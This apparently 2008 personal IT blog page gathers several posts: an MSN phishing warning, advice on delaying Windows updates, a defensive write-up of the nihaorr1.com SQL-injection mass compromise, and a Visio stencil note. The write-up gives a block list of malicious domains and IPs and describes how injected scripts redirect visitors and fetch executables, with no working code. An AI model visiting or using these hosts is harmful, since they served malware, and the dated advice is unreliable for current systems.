Beware of PICS FOR MSN FRIENDS Phishing Websites

If you see this kind of message from your MSN/Live Messenger buddy:
(1) Do NOT click and/or log yourself in that website, it’s a fake!
(2) Tell your buddy to reset his/her MSN/Live password immediately.
Detail in this link:
 
Here is another one, different style, same purpose.  Tell your friend to reset the password immediately!

Joe Smith has asked us to add you to his/her social network of Messenger friends on MeetYourMessenger.co.uk

Hi Bob

I would like to add you to my social network of Messenger friends on MeetYourMessenger.co.uk

-Joe Smith

See invitation from Joe Smith

 

Microsoft’s most recent update for Windows caused many people using Check Point’s ZoneAlarm firewall to lose their Internet connection

Put a leash on Windows’ automatic updates

Microsoft’s most recent update for Windows caused many people using Check Point’s ZoneAlarm firewall to lose their Internet connection. The patch fixes a potential DNS-related security breach that affects servers and clients alike, so I’m sure Microsoft was compelled to release it as quickly as possible.

That’s little consolation for the many ZoneAlarm users who struggled to regain their network connection. Read more about the problem, and find a link to Check Point’s solution, at Robert Vamosi’s Defense in Depth blog.

The fact is, even with potentially serious security holes such as this appears to be, you can usually wait a day or two before installing the update to make sure the fix doesn’t cause some problems of its own. Simply set Windows Update to download updates automatically but prompt you before installing them, or to alert you when an update is available for download so you can decide when to fetch it and implement it.

In Windows XP, click Start > Run, type sysdm.cpl, and press Enter. Click the Automatic Updates tab and choose either "Download updates for me, but let me choose when to install them," or "Notify me but don’t automatically download or install them." You can also choose "Turn off automatic updates," but I recommend either of the semi-automatic methods. When you’re done, click OK.

Choose either option that prevents Windows updates from being installed automatically.(Credit: Microsoft)

To change your Windows Update settings in Vista, press the Windows key, type windows update, and press Enter. Click Change settings in the left pane, and choose either "Download updates but let me choose whether to install them" or "Check for updates but let me choose whether to download or install them." As with XP, I caution against selecting "Never check for updates (Not recommended)." This is one of the few points on which Microsoft and I agree.

Now get into the habit of watching the tech news wires each Wednesday after Microsoft’s Patch Tuesdays to determine whether an update is going smoothly before applying it manually. Sometimes being first isn’t such a good idea.

Source: http://news.cnet.com/8301-13880_3-9988581-68.html?hhTest=1

Links:
http://news.cnet.com/8301-10789_3-9986625-57.html?hhTest=1
http://news.cnet.com/8301-10789_3-9987632-57.html?hhTest=1

What the hack is this nihaorr1.com/1.js? – updated Apr.19


Found anything special in the following Google search results?
    
Yes, except the 3rd link that points to the IIS.net forum, all other destinations in the search results have been compromised.  The codes between <script src= … and … </script> were planted into the contents of those websites by some kind of malicious hacking mechanism without webmasters’ awareness.  Do NOT click on any of those links!!!

This thread in IIS.net forum, Anyone know about www.nihaorr1.com/1.js? tells part of the story by a few people talking about their findings.  Basically, once the website is juggled, when the visitor clicks on the link that have hacking code implanted, the browser will be redirected to www.nihaorr1.com website and 1.js from that website will be executed.  Most web visitors would not notice anything except something like "Page cannot be found" shown in the brower, which doesn’t mean anything harmful.  But actually, the codes have already be running on their PCs.  So far, I saw there were test.exe, 1.js, Yahoo.php pulled from that website to the clients.  Those files are executable, if you have antivirus software installed with up-to-date antivirus definition, they will be quarantined; if you don’t have, I don’t know …

Webmasters, especially those run IIS, use ASP codes and have SQL database in the backend, check your servers, codes and databases.  Thousands of websites have been compromised as shown in Google search results.  There is no official information yet, but I personally quite agree to rwmorey, eftennis and davcox’s comments in http://forums.iis.net/p/1148917/1867622.aspx.  I will also add some new findings in the new few days. [Apr.18]

There are 2 more domains that could contain the same malicious code: aspder.com, 414151.com.  From somewhere some hackers are trying to plant the code in your web server or SQL database, so your visitor will be redirect to those sites and probably get infected.

Here is more details found in the Malware Domain Blocklist:

The IP address 60.172.219.4 contains

414151..com and a new domain, aspder..com

Source: http://www.robtex.com/ip/60.172.219.4.html

aspder..com resolves, and there are iframes popping up in google:

http://www.google.com/search?q=aspder.com

Needless to say, block this IP and domain. If anyone can download and analyze the iframe, we would appreciate more information. Thanks.

UPDATE: it’s a sql injection attack, see these links for more detail:

http://www.webhostingtalk.com/showthread.php?t=686032
http://www.webhostingtalk.com/showthread.php?p=5062187

These posts also mention twww..nihaorr1..com/1.js

Also in those threads in Web Hosting Talk (two links above), there are more details about how the hackers plant the code in you web servers and SQL servers.  The following is copied from that site:

Here is a link to shed light on the problem and how to mitigate it –

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx

Many high profile sites got hit by the injection of early april and also one in early march. Sites like usatoday-dot-com, forbes-dot-com, walmart-dot-com, and on and on. Several thousand sites got hit.

Here are some more links about it –

http://myitforum.com/cs2/blogs/cmosby/archive/2008/04/04/nmidahena-sans-internet-storm-center.aspx

http://isc.sans.org/diary.html?storyid=4210

http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html

Block the following on your proxy servers, home routers and other Internet gateway device, so your user will not get infected when the website they visit is compromised.  Besides the web and SQL servers, these are how you control the controllable as a server/network administrator.

IPs
60.172.219.4
24.28.193.9
219.153.46.28

Domains
aspder.com
*.aspder.com
nihaorr1.com
*.nihaorr1.com
414151.com
*.414151.com

Microsoft also published a security advisory 951306, not sure if it’s relevant, need to test and prove.  [Apr.19]

About Visio Stencil

HP doesn’t, only in one of its certified engineer websites, there is a link unofficially points to visiocafe.
 

Searching for a Visio stencil or template?

A couple of nights back, I was documenting the rack configuration for a client’s data centre.  Easy enough using a rack configuration tool from one of the major hardware vendors, except that most of us have multi-vendor rack contents and use Microsoft Visio to record the details.  Enter the index of Visio download sites.  Using this I was able to locate and download Visio stencils for Compaq/HP hardware, although Visio stencils for Dell servers seem to be a bit thin on the ground…